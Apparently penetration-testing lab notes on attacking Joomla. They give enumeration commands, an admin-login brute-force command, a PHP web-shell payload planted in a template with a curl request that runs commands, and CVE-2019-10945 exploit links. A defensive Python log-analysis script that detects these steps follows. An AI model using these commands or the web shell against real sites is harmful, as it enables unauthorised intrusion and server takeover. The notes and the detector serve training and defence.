Joomla
Introduction
CMS used for discussion forums, photo galleries, e-Commerce, user-based communities, and more.
Written in PHP and uses MySQL in the backend.
Joomla Discovery/Footprinting
droopescan scan joomla --url http://dev.inlanefreight.local
Enumeration via droopescan
python2.7 joomlascan.py -u http://dev.inlanefreight.local
Enumeration via joomlascan.py
curl -s http://dev.inlanefreight.local/ | grep Joomla
Check Webpage Source
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -
Some Joomla versions may be fingerprinted from this file
Browse to http://dev.inlanefreight.local/plugins/system/cache/cache.xml
The cache.xml file can give an approximate version of Joomla
Browse to http://dev.inlanefreight.local/media/system/js/
Some versions of Joomla can be fingerprinted by analyzing the JavaScript files in this folder
Browse to http://blog.inlanefreight.local/robots.txt
Check for references to Joomla
Browse to http://dev.inlanefreight.local/README.txt
Check the README file to look for references to Joomla
Joomla Users and Login Bruteforcing
Administrator account: The default administrator account is admin, but the password is set at install time
You can perform a login brute force using the following: https://github.com/ajnik/joomla-bruteforce
PoC:
sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
Joomla Known Vulnerabilities
PHP TEMPLATE CODE INJECTION TO RCE [Requires Admin Account]
The basic idea is to add PHP code inside a template
Log in as Admin → Navigate to Configuration → Select a Template → Select an existing PHP file → add the following payload:
system($_GET['cmd']);
curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id
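The version probes, login brute forcing and edited-template request described above all leave traces in the web server access log. The Python sketch below is an added example, not part of the original notes or of any tool they reference; the log lines are constructed, and the finding labels and the login threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1834 "-" "curl/7.88"
203.0.113.5 - - [10/Mar/2024:10:00:02 +0000] "GET /plugins/system/cache/cache.xml HTTP/1.1" 200 912 "-" "curl/7.88"
198.51.100.7 - - [10/Mar/2024:10:01:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:10:05:00 +0000] "POST /administrator/index.php HTTP/1.1" 200 4301 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:10:05:01 +0000] "POST /administrator/index.php HTTP/1.1" 200 4301 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:10:05:02 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.31"
203.0.113.5 - - [10/Mar/2024:10:09:00 +0000] "GET /templates/protostar/error.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.88"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
# Files the notes above use for version fingerprinting.
FINGERPRINT = {"/administrator/manifests/files/joomla.xml",
               "/plugins/system/cache/cache.xml", "/README.txt"}
TEMPLATE_PHP = re.compile(r"^/templates/[^/]+/[^/]+\.php$")

def analyze(log_text, login_threshold=3):
    """Return (ip, label, detail) findings; login_threshold is an assumed value."""
    findings, logins = [], Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target = m.groups()
        url = urlsplit(target)
        if url.path in FINGERPRINT:
            findings.append((ip, "version-probe", url.path))
        # Template PHP files are normally included by Joomla, not requested
        # directly, so a direct hit carrying query parameters is suspicious.
        if TEMPLATE_PHP.match(url.path) and parse_qs(url.query):
            findings.append((ip, "template-php-with-params", target))
        if method == "POST" and url.path == "/administrator/index.php":
            logins[ip] += 1
    for ip, count in logins.items():
        if count >= login_threshold:
            findings.append((ip, "admin-login-burst", str(count)))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding, sep="\t")
```

On a production log, tune the threshold to the site's normal administrator activity and count logins per time window rather than over the whole file.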
Joomla 3.9.4 directory traversal CVE-2019-10945
Exploit 1: https://www.exploit-db.com/exploits/46710
Exploit 2: https://github.com/dpgg101/CVE-2019-10945